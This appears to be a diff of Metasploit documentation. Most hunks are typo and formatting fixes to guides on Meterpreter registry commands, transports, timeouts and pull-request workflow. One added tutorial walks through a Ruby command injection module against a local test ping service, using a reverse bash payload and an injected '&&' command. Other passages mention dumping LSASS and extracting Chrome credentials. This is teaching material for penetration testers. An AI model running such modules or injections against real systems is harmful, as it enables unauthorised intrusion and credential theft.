+With this output `uid=1000(meta) gid=1000(meta)`, we know that the `id` command successfully executed on the target system. Now that we have a vulnerable application we can write a module to pwn it.
+
+## The Structure of a Module
+
+To have a functioning command injection Metasploit module we **need** a few things:
+
+1. Create a subclass of `Msf::Exploit::Remote`
+2. Include the `Msf::Exploit::Remote::HttpClient` mixin
+3. Define three methods:
+   - `initialize`, which defines metadata for the Module
+   - `execute_command`, which is what runs the command against the remote server
+   - `exploit`, wraps `execute_command`, and can handle some logic when we move to a cmdstager module
+4. (Not required, but recommended) a method to substitute or escape bad characters, to be used inside `execute_command`. This could also just be done inside `execute_command` instead of a separate function call.
+
+### Where to put a Module
+
+Metasploit looks for custom modules at `$HOME/.msf4/modules`, but the way you get modules there varies based on how you're running Metasploit.
+
+- If you have a full install of Metasploit on your host, you can just add your custom module to `$HOME/.msf4/modules/exploits/custom_mod.rb`.
+  - You can also just add a module to Metasploit's modules folder - This can be helpful when troubleshooting, but it's not recommended
+- **Docker** If you're using the [Docker Image](https://github.com/rapid7/metasploit-framework/tree/master/docker), you can also add modules to `$HOME/.msf4/modules` and that folder will be mounted as a volume inside the Docker container
+  - You can also change the mount point by modifying the [docker-compose](https://github.com/rapid7/metasploit-framework/blob/master/docker-compose.yml) file
+
+For testing, the easiest thing to do is the simplest. You can find Metasploit's **exploit** directory, copy a file, rename it, and go from there.
+
+## A Shell of a Module
+
+The shell of a module that follows the above format is something like this:
+
+```ruby
+class MetasploitModule < msf::Exploit::Remote
+  Rank = GoodRanking
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    # empty for now
+  end
+
+  def filter_bad_chars(cmd)
+    # empty for now
+  end
+
+  def execute_command(cmd, _opts = {})
+    # empty for now
+  end
+
+  def exploit
+    # empty for now
+  end
+end
+```
+
+This covers every essential point from [The Structure of a Module](#the-structure-of-a-module), although it won't run yet.
+
+## Initialize
+
+The `initialize` method is used to define and pass metadata. Every `initialize` method in the metasploit-framework codebase follows the format of an empty `info` being passed into `update_info`, which gets passed to the `msf::Exploit::Remote` `initialize` method:
+
+```ruby
+def initialize(info = {})
+  super(
+    update_info(
+      info,
+      # Here is where the metadata goes
+      'Name' => 'Command Injection against a test Ping endpoint',
+      'Description' => 'This exploits a command injection vulnerability against a test application',
+      'License' => MSF_LICENSE,
+      'Author' => 'YOUR NAME',
+      'References' => [
+        ['URL', 'https://metasploit.com/']
+      ],
+      'DisclosureDate' => '2023-08-04',
+      'Platform' => 'linux', # used for determining compatibility - if you're doing code injection, this may be the language of the webapp
+      'Targets' => [
+        'Unix Command',
+        {
+          'Platform' => ['linux', 'unix'], # linux and unix have different cmd payloads, this gives you more options
+          'Arch' => ARCH_CMD,
+          'Type' => :unix_cmd, # Running a command - this would be `:linux_dropper` for a cmdstager dropper
+          'DefaultOptions' => {
+            'PAYLOAD' => 'cmd/unix/reverse_bash',
+            'RPORT' => 8000,
+          }
+        }
+      ],
+      'Payload' => {
+        'BadChars' => '\x00',
+      }
+      'Notes' => { # Required for new modules https://docs.metasploit.com/docs/development/developing-modules/module-metadata/definition-of-module-reliability-side-effects-and-stability.html
+        'Stability' => [CRASH_SAFE],
+        'Reliability' => [REPEATABLE_SESSION],
+        'SideEffects' => [IOC_IN_LOGS]
+      }
+      # Some more metadata options are here: https://docs.metasploit.com/docs/development/developing-modules/module-metadata/module-reference-identifiers.html#code-example-of-references-in-a-module
+    )
+  )
+end
+```
+
+All that this method does is register metadata to the module.
+
+## Filtering
+
+It's important to ensure that payloads being sent are properly encoded. As an example, if you send a request to the `/ping` endpoint that looks like `/ping?ip=1.1.1.1&&id`, you won't see the "uid=1000(meta) gid=1000(meta)" in the response because `&` is a special character in HTTP.
+
+Encoding requirements might change based on the application you're trying to inject, so experiment if things aren't working.
+
+```ruby
+def filter_bad_chars(cmd)
+  return cmd
+    .gsub(/&/, '%26')
+    .gsub(/ /, '%20')
+end
+```
+
+`filter_bad_chars` takes in `cmd`, which is a string. `cmd` has two substitutions applied - the first will translate `&` to `%26`, the second translates a space to `%20`. The `.gsub` statements are a global substitution across the string, so the entire payload is impacted by the substitutions here (Similar to str.replace in Python). Regardless of whether or not the string is modified, it is returned.
+
+## Execution
+
+The `execute_command` method takes in `cmd` and `_opts` and executes the command on the target. In our case, executing a command is simply adding the command to a GET request and sending it to the `/ping` endpoint on our sample service.
+
+```ruby
+def execute_command(cmd, _opts = {})
+  send_request_cgi({
+    'method' => 'GET',
+    'uri' => '/ping',
+    'encode_params' => false,
+    'vars_get' => {
+      'ip' => "bing.com%20%26%26%20#{filter_bad_chars(cmd)}",
+    }
+  })
+end
+```
+
+We don't even need to handle the output of `send_request_cgi` (Really, there should be no return until the shell exits, since the call to `subprocess.run` doesn't return until that shell dies).
+
+## Exploitation
+
+To finish up, all we need is to define the `exploit` method. This method is called by Metasploit when you use `run` within a msfconsole. All that we'll do here is print a little status message and run the exploit, but later you can modify this method to handle droppers as well:
+
+```ruby
+def exploit
+  print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
+  execute_command(payload.encoded)
+end
+```
+
+If you're running Metasploit and the vulnerable Python service on the same machine, you should be able to simply set the variables and fire:
+
+```sh
+set RHOST 127.0.0.1
+set LHOST 127.0.0.1
+run
+```
+
+## Conclusion
+
+That's it. Put it all together and you have a very simple Command Injection exploit module that shows you the basics of how to throw a payload. Play around with different payloads, follow the [[How-to-use-command-stagers]] guide, add some logging to the Python web server, and watch executions over Wireshark. You'll learn a lot.
@@ -8,7 +8,7 @@ Here is how you can set it up:

 ```ruby
 ##
-# This module requires Metasploit: http://metasploit.com/download
+# This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##

@@ -54,16 +54,16 @@ In addition, we're going to add a magical line to the config file that will let

 So, open up `metasploit-framework/.git/config` with your favorite editor, add an upstream remote, and add the pull request refs for both your and Rapid7's forks. In the end, you should have a section that started off like this:

-````config
+```config
 [remote "upstream"]
  fetch = +refs/heads/*:refs/remotes/upstream/*
  fetch = +refs/pull/*/head:refs/remotes/upstream/pr/*
  url = https://github.com/rapid7/metasploit-framework
-````
+```

 And now it looks like this:

-````config
+```config
 [remote "upstream"]
  fetch = +refs/heads/*:refs/remotes/upstream/*
  fetch = +refs/pull/*/head:refs/remotes/upstream/pr/*
@@ -72,13 +72,13 @@ And now it looks like this:
  fetch = +refs/heads/*:refs/remotes/origin/*
  fetch = +refs/pull/*/head:refs/remotes/origin/pr/*
  url = https://github.com/YOURNAME/metasploit-framework
-````
+```

 Some people like to copy these over into remotes named "rapid7" and "yourusername" just so they don't have to remember about "origin" and "upstream," but for this doc, we'll just assume you have "origin" and "upstream" defined like this.

 Now, you can git fetch the remote PRs. This will take a little bit, since we have a couple dozen MBs of pull request data. Storage is cheap, though, right?

-````
+```
 $ git fetch --all
 Fetching todb-r7
 remote: Counting objects: 13, done.
@@ -97,7 +97,7 @@ From https://github.com/rapid7/metasploit-framework
 [... bunches of tags and PRs ...]
 * [new ref]         refs/pull/1701/head -> upstream/pr/1701
 * [new ref]         refs/pull/1702/head -> upstream/pr/1702
-````
+```

 You can `git fetch` a remote any time, and you'll get access to the latest changes to all branches and pull requests.

@@ -105,7 +105,7 @@ You can `git fetch` a remote any time, and you'll get access to the latest chang

 A manageable strategy for dealing with outstanding PRs is to start pre-merge testing on the pull request in isolation. For example, to work on PR #1217, we would:

-````
+```
 $ git checkout upstream/pr/1217
 Note: checking out 'upstream/pr/1217'.

@@ -124,7 +124,7 @@ HEAD is now at 9e499e5... Make BindTCP test more robust

 ```
 $ git checkout -b landing-1217
-````
+```

 Now, we're on a local branch identical to the original pull request, and can move on from there. We can make our changes, isolated from master, and then either send them back to the contributor (this requires looking up the original contributor's GitHub username and branch name on GitHub), or if there aren't any changes or the changes are trivial, we can land them (if you have committer rights to Rapid7's repo, this is where you land them to the upstream repo).

@@ -173,7 +173,7 @@ You need to add their fork once as a remote: `git remote add OTHER_USER git://gi

 # Making changes

-````
+```
 $ gvim .gitignore
 [... make some changes and some commits ...]
 (landing-1217) todb@mazikeen:~/git/rapid7/metasploit-framework
@@ -184,19 +184,19 @@ $ git push origin pr1271-fix-gitignore-conflict
 (pr1217-fix-gitignore-conflict) todb@mazikeen:~/git/rapid7/metasploit-framework
 $ git pr-url schierlm javapayload-maven
 Created new window in existing browser session.
-````
+```

 This sequence does a few things after editing `.gitconfig`. It creates another copy of landing-1217 (which is itself a copy of upstream/pr/1217)). Next, I push those changes to my branch (todb-r7, aka "origin"). Finally, I have a mighty [.gitconfig alias here](https://gist.github.com/todb-r7/5438391) to open a browser window to send a pull request to the original contributor's branch (you will want to edit yours to reflect your real GitHub username, of course).

-````
+```ini
 pr-url = !"echo https://github.com/YOURNAME/metasploit-framework/pull/new/HISNAME:HISBRANCH...YOURBRANCH"
-````
+```

 Filling in the blanks (provided by the original PR's information from GitHub) gets me:

-````
+```
 https://github.com/todb-r7/metasploit-framework/pull/new/schierlm:javapayload-maven...pr1217-fix-gitignore-conflict
-````
+```

 I opened that in a browser, and ended up with https://github.com/schierlm/metasploit-framework/pull/1 . Once [@schierlm](https://github.com/schierlm) landed it on his branch (again, using `git merge --no-ff` and a short, informational merge commit message), all I (or anyone) had to do was `git fetch` to get the change reflected in upstream/pr/1217, and then the integration of the PR could continue.

@@ -208,7 +208,7 @@ Note the important bit here: **you do not need commit rights to Rapid7 to branch

 Back to PR #1217. Turns out, my change was enough to land the original chunk of work. So, someone else ([@jlee-r7](https://github.com/jlee-r7)) was able to to do something like this:

-````
+```
 $ git fetch upstream
 remote: Counting objects: 12, done.
 remote: Compressing objects: 100% (2/2), done.
@@ -216,31 +216,31 @@ remote: Total 7 (delta 5), reused 7 (delta 5)
 Unpacking objects: 100% (7/7), done.
 From https://github.com/rapid7/metasploit-framework
   9e499e5..263e967  refs/pull/1651/head -> upstream/pr/1651
-````
+```

 This all looked good, so he could land this to Rapid7's repo with:

-````
+``
 $ git checkout -b upstream-master --track upstream/master
 $ git merge -S --no-ff --edit landing-1217
 $ git push upstream upstream-master:master
-````
+``

 Or, if he already have upstream-master checked out:

-````
+```
 $ git checkout upstream-master
 $ git rebase upstream/master
 $ git merge -S --no-ff --edit landing-1217
 $ git push upstream upstream-master:master
-````
+```

 The `--edit` is optional if we have our editor configured correctly in `$HOME/.gitconfig`. The point here is that we *always* want a merge commit, and we *never* want to use the (often useless) default merge commit message. For #1217, this was changed to:

-````commit
+```
 Land #1217, java payload build system refactor

-````
+```

 Note that you should rebase *before* landing -- otherwise, your merge commit will be lost in the rebase.

@@ -248,7 +248,7 @@ Finally, the -S indicates we are going to sign the merge, using our GPG key. Thi

 To set yourself up for signing, your .gitconfig (or metasploit-framework/git/.config) file should have these entries:

-````
+```ini
 [user]
 name = Your Name
 email = your@email.xxx
@@ -256,7 +256,7 @@ signingkey = DEADBEEF # Must match exactly with your key for "Your Name <your@em
 [alias]
 c = commit -S --edit
 m = merge -S --no-ff --edit
-````
+```

 People with commit rights to rapid7/metasploit-framework will have their [[keys listed here|./Committer-Keys.md]].

@@ -271,10 +271,6 @@ Release note examples:

 The [rn-no-release-notes](https://github.com/rapid7/metasploit-framework/issues?utf8=%E2%9C%93&q=label%3Arn-no-release-notes+) label must be added if there are no release notes for the merged pull request.

-# Cross-linking PRs, Bugs, and Commits
-
-TODO: Update in this new post-Redmine, GitHub issues world
-
 # Merge conflicts

 The nice thing about this strategy is that you can test for merge conflicts straight away. You'd use a sequence like:
@@ -16,7 +16,7 @@ If listeners are externalized, then there is an API layer both for interactive i

 ### Integration of native tool-chains

-Tools like Veil, pwnlib, etc. have for a long time used native compilers and tooling to build payloads and evasions. Metasploit has opted mostly for native Ruby solutions, though it does have some implicit runtime dependencies like `apktool` for Android payload injection. However, these tools are getting harder to maintain and use (e.g. metasm has a diffcult time building any non-trivial C code, we just spent a month fixing a bug it had with Ruby 2.5 and Windows). It would be nice to have either be able to depend on a set of first-class toolchains being available in the environment, or have some way to package them natively with Metasploit itself. A full suite of compilers and tools does consume considerable amounts of space (e.g. mettle's toolchain is 1.8GB uncompressed), but this is probably less of a problem than it was 15 years ago.
+Tools like Veil, pwnlib, etc. have for a long time used native compilers and tooling to build payloads and evasions. Metasploit has opted mostly for native Ruby solutions, though it does have some implicit runtime dependencies like `apktool` for Android payload injection. However, these tools are getting harder to maintain and use (e.g. metasm has a difficult time building any non-trivial C code, we just spent a month fixing a bug it had with Ruby 2.5 and Windows). It would be nice to have either be able to depend on a set of first-class toolchains being available in the environment, or have some way to package them natively with Metasploit itself. A full suite of compilers and tools does consume considerable amounts of space (e.g. mettle's toolchain is 1.8GB uncompressed), but this is probably less of a problem than it was 15 years ago.

 ### Native first-class UUID-aware, async stager payload

@@ -26,7 +26,7 @@ Make a new async payload type (based on pingback payload work) making secure com

 ### Overhaul network targeting

-Setting at least 5 variables RHOSTS/RPORT/SSL/VHOST/SSL_Version/User/Pass/etc... to target a single web application is very cumbersome. When these variables also do not apply to multiple RHOSTS exactly, the scheme of multiple variables falls apart futher. Metasploit should be able to target URLs directly, that can all have their own independent ports, users, hostnames, etc:
+Setting at least 5 variables RHOSTS/RPORT/SSL/VHOST/SSL_Version/User/Pass/etc... to target a single web application is very cumbersome. When these variables also do not apply to multiple RHOSTS exactly, the scheme of multiple variables falls apart further. Metasploit should be able to target URLs directly, that can all have their own independent ports, users, hostnames, etc:

 ```
 set TARGETS https://user:password@target_app:4343 https://target_app2
@@ -73,7 +73,7 @@ This module has a selection of inbuilt queries which can be configured via the `
 - `ENUM_ALL_OBJECT_CATEGORY` - Dump all objects containing any objectCategory field.
 - `ENUM_ALL_OBJECT_CLASS` - Dump all objects containing any objectClass field.
 - `ENUM_COMPUTERS` - Dump all objects containing an objectCategory or objectClass of Computer.
- `ENUM_CONSTRAINED_DELEGATION` - Dump info about all known objects that allow contrained delegation.
+- `ENUM_CONSTRAINED_DELEGATION` - Dump info about all known objects that allow constrained delegation.
 - `ENUM_DNS_RECORDS` - Dump info about DNS records the server knows about using the dnsNode object class.
 - `ENUM_DNS_ZONES` - Dump info about DNS zones the server knows about using the dnsZone object class under the DC DomainDnsZones. This isneeded - as without this BASEDN prefix we often miss certain entries.
 - `ENUM_DOMAIN` - Dump info about the Active Directory domain.
@@ -89,7 +89,7 @@ This module has a selection of inbuilt queries which can be configured via the `
 - `ENUM_MACHINE_ACCOUNT_QUOTA` - Dump the number of computer accounts a user is allowed to create in a domain.
 - `ENUM_ORGROLES` - Dump info about all known organization roles in the LDAP environment.
 - `ENUM_ORGUNITS` - Dump info about all known organizational units in the LDAP environment.
- `ENUM_UNCONSTRAINED_DELEGATION` - Dump info about all known objects that allow uncontrained delegation.
+- `ENUM_UNCONSTRAINED_DELEGATION` - Dump info about all known objects that allow unconstrained delegation.
 - `ENUM_USER_ACCOUNT_DISABLED` - Dump info about disabled user accounts.
 - `ENUM_USER_ACCOUNT_LOCKED_OUT` - Dump info about locked out user accounts.
 - `ENUM_USER_ASREP_ROASTABLE` - Dump info about all users who are configured not to require kerberos pre-authentication and are therefore AS-REP roastable.
@@ -23,7 +23,7 @@ Matching Modules

 There are two ways to launch a Post module, both require an existing session.

-Within a msf prompt you can use the `use` comand followed by the `run` command to execute the module against the required session. For instance to extract credentials from Chrome on the most recently opened Metasploit session:
+Within a msf prompt you can use the `use` command followed by the `run` command to execute the module against the required session. For instance to extract credentials from Chrome on the most recently opened Metasploit session:

 ```msf
 msf6 > use post/windows/gather/enum_chrome
@@ -4,7 +4,7 @@ SMB (Server Message Blocks), is a way for sharing files across nodes on a networ

 There are two main ports for SMB:

- 139/TCP - Initially Microsoft implemented SMB ontop of their existing NetBIOS network architecture, which allowed for Windows computers to communicate across the same network
+- 139/TCP - Initially Microsoft implemented SMB on top of their existing NetBIOS network architecture, which allowed for Windows computers to communicate across the same network
 - 445/TCP - Newer versions of SMB use this port, were NetBIOS is not used.

 Other terminology to be aware of:
@@ -10,7 +10,7 @@ Meterpreter even when running on the Windows platform.
 crashes, the Meterpreter session will die. It is suggested that users invoke this functionality through a dedicated
 session to avoid losing access altogether.

-The loader and execution environment are provided by [trustedsec/COFFLoader][3]. The extension is therefor subject to
+The loader and execution environment are provided by [trustedsec/COFFLoader][3]. The extension is therefore subject to
 the same limitations.

 The following functions are unavailable:
@@ -33,8 +33,6 @@ The `bofloader` extension provides exactly one command, through which all of the

 `execute_bof </path/to/bof_file> [Options] -- [BOF Arguments]`

-
-
 * `-c` / `--compile` -- Compile the input file (requires mingw).
 * `-e` / `--entry` -- The entry point (default: `go`).
 * `-f` / `--format-string` -- Argument format-string. See details below.
@@ -79,7 +77,7 @@ argument format string.
 # Usage Examples
 Executing [dir][4], passing the path argument and number of sub-directories to list.

-```
+```msf
 meterpreter > execute_bof CS-Situational-Awareness-BOF/SA/dir/dir.x64.o --format-string Zs C:\\ 0
 Contents of C:\*:
 	08/05/2022 15:17           <dir> $Recycle.Bin
@@ -103,7 +101,7 @@ meterpreter >
 Executing [nanodump][5]. First the PID of LSASS is found, then the argument string is constructed. The output must be
 written to disk. Once completed, the dump file can be downloaded from the remote host.

-```
+```msf
 meterpreter > ps lsass
 Filtering on 'lsass'

@@ -32,7 +32,7 @@ Each value also has an associated type, for example:

 All of these examples assume you are in a Meterpreter session. To see the latest help information run `help reg`:

-```
+```msf
 meterpreter > help reg
 Usage: reg [command] [options]
 Interact with the target machine's registry.
@@ -44,7 +44,7 @@ Interact with the target machine's registry.

 Registry keys must be escaped correctly. Window's registry keys are escaped with backslashes. In msfconsole backslashes and spaces have a special meaning - which means you will need to escape these characters for your key to work as expected.

-```
+```msf
 # Valid: Using single quotes around the registry key
 meterpreter > reg enumkey -k 'HKCU\Keyboard Layout'

@@ -75,7 +75,7 @@ Active sessions

 For example - when interacting with a x86 session there are 12 keys listed:

-```
+```msf
 # x86 Session
 meterpreter > reg enumkey -k 'HKEY_LOCAL_MACHINE\Software\Microsoft\Windows'
 Enumerating: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
@@ -86,7 +86,7 @@ Enumerating: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows

 Versus a x64 session which shows 23 keys:

-```
+```msf
 # x64 Session
 meterpreter > reg enumkey -k 'HKEY_LOCAL_MACHINE\Software\Microsoft\Windows'
 Enumerating: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
@@ -98,7 +98,7 @@ Enumerating: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows

 If this is problematic either [[upgrade your session to Meterpreter|./Metasploit-Guide-Upgrading-Shells-to-Meterpreter.md]], or specify the `-w` flag which will impact the result of queries:

-```
+```msf
 meterpreter > reg enumkey -k 'HKEY_LOCAL_MACHINE\Software\Microsoft\Windows' -w 32
 Enumerating: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows

@@ -106,7 +106,7 @@ Enumerating: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
  # ... omitted for clarity ...
 ```

-```
+```msf
 meterpreter > reg enumkey -k 'HKEY_LOCAL_MACHINE\Software\Microsoft\Windows' -w 64
 Enumerating: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows

@@ -119,7 +119,7 @@ Enumerating: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows

 Enumerate a root key:

-```
+```msf
 meterpreter > reg enumkey -k HKLM
 Enumerating: HKLM

@@ -135,7 +135,7 @@ Enumerating: HKLM

 Enumerate a subkey:

-```
+```msf
 meterpreter > reg enumkey -k 'HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run'
 Enumerating: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run

@@ -149,7 +149,7 @@ Enumerating: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run

 Display the registry value and type information:

-```
+```msf
 meterpreter > reg queryval -k 'HKLM\Software\Microsoft\Windows NT\CurrentVersion' -v ProductName
 Key: HKLM\Software\Microsoft\Windows NT\CurrentVersion
 Name: ProductName
@@ -159,7 +159,7 @@ Data: Windows 10 Enterprise

 Values that are of type `REG_SZ_EXPAND` such as ` %SystemRoot%\system32\drivers\GM.DLS` will not automatically be expanded:

-```
+```msf
 meterpreter > reg queryval -k 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\DirectMusic' -v 'GMFilePath'
 Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\DirectMusic
 Name: GMFilePath
@@ -169,7 +169,7 @@ Data: C:\Windows\system32\drivers\GM.DLS

 Values that are of type `REG_MULTI_SZ` will be separated by `\0`:

-```
+```msf
 meterpreter > reg queryval -k 'HKLM\Software\example' -v 'example multi value with spaces'
 Key: HKLM\Software\example
 Name: example multi value with spaces
@@ -179,7 +179,7 @@ Data: line1\0line2\0line3

 ### Creating a key

-```
+```msf
 meterpreter > reg createkey -k 'HKLM\software\example'
 Successfully created key: HKLM\software\example
 ```
@@ -188,42 +188,42 @@ Successfully created key: HKLM\software\example

 Setting a `REG_DWORD` - use a decimal value:

-```
+```msf
 meterpreter > reg setval -k 'HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\system' -v LocalAccountTokenFilterPolicy -t REG_DWORD -d 1
 Successfully set LocalAccountTokenFilterPolicy of REG_DWORD.
 ```

 Setting a `REG_QWORD` - use a decimal value:

-```
+```msf
 meterpreter > reg setval -k 'HKLM\Software\example' -t REG_DWORD -v qword_example -d 12345678
 Successfully set example multi value with spaces of REG_MULTI_SZ.
 ```

 Setting `REG_MULTI_SZ` - i.e. an array of strings:

-```
+```msf
 meterpreter > reg setval -k 'HKLM\Software\example' -t REG_MULTI_SZ -v 'example multi value with spaces' -d 'line1\0line2\0line3'
 Successfully set example multi value with spaces of REG_MULTI_SZ.
 ```

 Setting `REG_BINARY` - use lowercase hexadecimal input without the preceding `0x`:

-```
+```msf
 meterpreter > reg setval -k 'HKLM\Software\example' -t REG_BINARY -v binary_example -d deadbeef
 Successfully set binary_example of REG_BINARY.
 ```

 ### Deleting a key

-```
+```msf
 meterpreter > reg deletekey -k 'HKLM\software\example'
 Successfully deleted key: HKLM\software\example
 ```

 ### Deleting a value

-```
+```msf
 meterpreter > reg deleteval -k 'HKLM\software\example' -v 'example multi value with spaces'
 Successfully deleted example multi value with spaces.
 ```
@@ -2,7 +2,7 @@ Of the many recent changes to Meterpreter, reliable network communication is one

 In the case of HTTP/S transports, some resiliency features were present. Thanks to its stateless nature, HTTP/S transports would continue to attempt to talk to Metasploit after network outages or other unexpected problems as each command request/response is transmitted over a fresh connection. TCP based transports had nothing that would attempt to reconnect should some kind of network issue occur.

-Revamped [[transport|./Meterpreter-Transport-Control.md]] implementations have provided support for resiliency even for TCP based communcations. Any session that isn't properly terminated by Metasploit will continue to function behind the scenes while Meterpreter attempts to re-establish communications with Metasploit.
+Revamped [[transport|./Meterpreter-Transport-Control.md]] implementations have provided support for resiliency even for TCP based communications. Any session that isn't properly terminated by Metasploit will continue to function behind the scenes while Meterpreter attempts to re-establish communications with Metasploit.

 It is also possible to control the behaviour of this functionality a little via the use of the various timeout values that can be specified when adding transports to the session, and also on the fly for the current transport. For full details, please see the [[timeout documentation|./Meterpreter-Timeout-Control.md]] for details on those timeout values.

@@ -16,7 +16,7 @@ During this dormant period, no socket is active, no requests are made, and no re

 The interface to the sleep command looks like this:

-```
+```msf
 meterpreter > sleep
 Usage: sleep <time>

@@ -27,11 +27,11 @@ Usage: sleep <time>
  shut down and restarted after the designated timeout.
 ```

-As shown, `sleep` expects to be given a single postive integer value that represents the number of seconds that Meterpreter should be silent for. When run, the session will close, and then callback after the elapsed period of time. Given that Meterpreter lives in memory, this lack of communication will make it extremely difficult to track.
+As shown, `sleep` expects to be given a single positive integer value that represents the number of seconds that Meterpreter should be silent for. When run, the session will close, and then callback after the elapsed period of time. Given that Meterpreter lives in memory, this lack of communication will make it extremely difficult to track.

 The following shows a sample run where Meterpreter is put to sleep for 20 seconds, after which the session reconnects while the handler is still in background:

-```
+```msf
 meterpreter > sleep 20
 [*] Telling the target instance to sleep for 20 seconds ...
 [+] Target instance has gone to sleep, terminating current session.
@@ -57,7 +57,7 @@ The data or time cost of uploading `metsrv`, `stdapi` and `priv` for every singl
 
 It's hard to believe it possible, but in this case the following image could be considered a nightmare.

-```
+```msf
 [*] Sending stage (173056 bytes) to xxx.xxx.xxx.xxx
 [*] Meterpreter session 4684 opened ....
 [*] Sending stage (173056 bytes) to xxx.xxx.xxx.xxx
@@ -95,7 +95,7 @@ With this shellcode stub wired into the DOS header, Metasploit adds the entire b
 1. Loads the extension DLL into memory.
 1. Calculates the size of the DLL.
 1. Writes the size of the DLL as a 32-bit value to the configuration block.
-1. Writes the entire body of the DLL, as-is, to the end of the conifiguration block.
+1. Writes the entire body of the DLL, as-is, to the end of the configuration block.
 
 Once the end of the list of extensions is reached, the last thing that is written to the payload buffer is a 32-bit representation of `0` (`NULL`) which indicates that the list of extensions has been terminated. This `NULL` value is what `metsrv` will look for when iterating through the list of extensions so that it knows when to stop. After this, any extension initialisation scripts are wired in (though that's beyond the scope of this article).
 
@@ -150,4 +150,4 @@ Congratulations, you're dancing with stageless Meterpreter!
 
 At this point, all of the pre-loaded extensions have been loaded into Meterpreter and are available for use. However, Metasploit is yet to know about them. To initiate client-site wiring of any of the pre-loaded extensions, the user can just type `use <extension>` just like they used to. Metasploit will check to see if the extension already exists in the target instance, and if it does, it will skip the extension upload and just wire-up the functions on the client side. If the extension is missing, then it will upload it and wire-up the functions on the fly just like it always has done.
 
-If you're working with `meterpreter_reverse_https`, you'll notice that when new shells come in they appear just like an orphaned instance. This is expected behaviour, because a stageless session can't and won't look any different to an old session that hasn't been in touch with Metasploit for a while.
+If you're working with `meterpreter_reverse_https`, you'll notice that when new shells come in they appear just like an orphaned instance. This is expected behaviour, because a stageless session can't and won't look any different to an old session that hasn't been in touch with Metasploit for a while.
@@ -28,13 +28,13 @@ In the case of `HTTP/S` payloads it's slightly different because the protocols a

 With `TCP` transports, communication "times out" when the time between the last packet and the current socket poll is greater than the communications timeout value. This happens when there are network related issues that prevent data from being transmitted between the two endpoints, but doesn't cause the socket to completely disconnect. With `HTTP/S` transports, the communication "times out" for the same reason, but the evaluation of the condition is slightly different in that failure can occur because there is either no response at all from the remote server, or the response to a `GET` request results in no acknowledgement.

-By default, this value is set to `300` seconds (`5` minutes), but can be overidden by the user via the `SessionCommunicationTimeout` setting.
+By default, this value is set to `300` seconds (`5` minutes), but can be overridden by the user via the `SessionCommunicationTimeout` setting.

 If connectivity fails, or the communication is deemed to have timed out. Then the current transport is destroyed, and the next transport in the list of transports is invoked. From there, Meterpreter will use the Retry Total and Retry Wait values while attempting to re-establish a session with Metasploit.

 #### Retry Total and Retry Wait

-After a transport initialises inside Meterpreter, Meterpreter uses this transport to attempt to establish a new session with Metasploit. In some cases, Metasploit might not be availalble due to reasons like bad network connectivity, or a lack of configured listeners. If Meterpreter can't connect to Metasploit, it will attempt to retry for a period of time. Once that period of time expires, Meterpreter will deem this transport "dead" and will move to the next one in the transport list.
+After a transport initialises inside Meterpreter, Meterpreter uses this transport to attempt to establish a new session with Metasploit. In some cases, Metasploit might not be available due to reasons like bad network connectivity, or a lack of configured listeners. If Meterpreter can't connect to Metasploit, it will attempt to retry for a period of time. Once that period of time expires, Meterpreter will deem this transport "dead" and will move to the next one in the transport list.

 The total amount of time that Meterpreter will attempt to connect back to Metasploit on the given transport is indicated by the `retry total` value. That is, `retry total` is the total amount of time that Meterpreter will retry communication on the transport. The default value is `3600` seconds (`1` hour), and can be overridden via the `SessionRetryTotal` setting.

@@ -44,7 +44,7 @@ While the current time is within the `retry total` time, Meterpreter will consta

 Meterpreter supports the querying and updating of each of these timeouts via the console. In order to get the current timeout settings, users can invoke the `get_timeouts` command, which returns all four of the current timeout settings (one for the global session, and three for the transport-specific settings). An example of which is shown below:

-```
+```msf
 meterpreter > get_timeouts 
 Session Expiry  : @ 2015-06-09 19:56:05
 Comm Timeout    : 100000 seconds
@@ -56,7 +56,7 @@ The `Session Expiry` value is rendered as an absolute local time so that the use

 In order to update these values, users can invoke the `set_timeouts` command. Invoking it without parameters shows the help:

-```
+```msf
 meterpreter > set_timeouts 
 Usage: set_timeouts [options]

@@ -69,7 +69,7 @@ OPTIONS:
    -h        Help menu
    -t <opt>  Retry total time (seconds)
    -w <opt>  Retry wait time (seconds)
-    -x <opt>  Expiration timout (seconds)
+    -x <opt>  Expiration timeout (seconds)
 ```
 As the help implies, each of these settings takes a value that indicates the number of seconds. Each of the options of this command are optional, so the user can update only those values that they are interested in updating. When the command is invoked, Meterpreter is updated, and the result shows the updated values once the changes have been made.

@@ -77,7 +77,7 @@ In the case of the `-x` parameter, the value that is to be passed in should repr

 The following example updates the session expiration timeout to be `2` minutes from "now", and changes the retry wait time to `3` seconds:

-```
+```msf
 meterpreter > set_timeouts -x 120 -t 3
 Session Expiry  : @ 2015-06-02 22:45:13
 Comm Timeout    : 100000 seconds
@@ -86,7 +86,7 @@ Retry Wait Time : 2500 seconds
 ```

 This command can be invoked any number of times while the session is valid, but as soon as the session has expired, Metepreter will shut down and it's game over:
-```
+```msf
 meterpreter > 
 [*] 10.1.10.35 - Meterpreter session 2 closed.  Reason: Died
 ```
@@ -26,7 +26,7 @@ Meterpreter has a new base command called `transport`. This is the hub of all tr

 The following output shows the current help text for the `transport` command:

-```bash
+```msf
 meterpreter > transport
 Usage: transport <list|change|add|next|prev|remove> [options]

@@ -48,7 +48,7 @@ OPTIONS:
    -T <opt>  Retry total time (seconds) (default: same as current session)
    -U <opt>  Proxy username for HTTP/S transports (optional)
    -W <opt>  Retry wait time (seconds) (default: same as current session)
-    -X <opt>  Expiration timout (seconds) (default: same as current session)
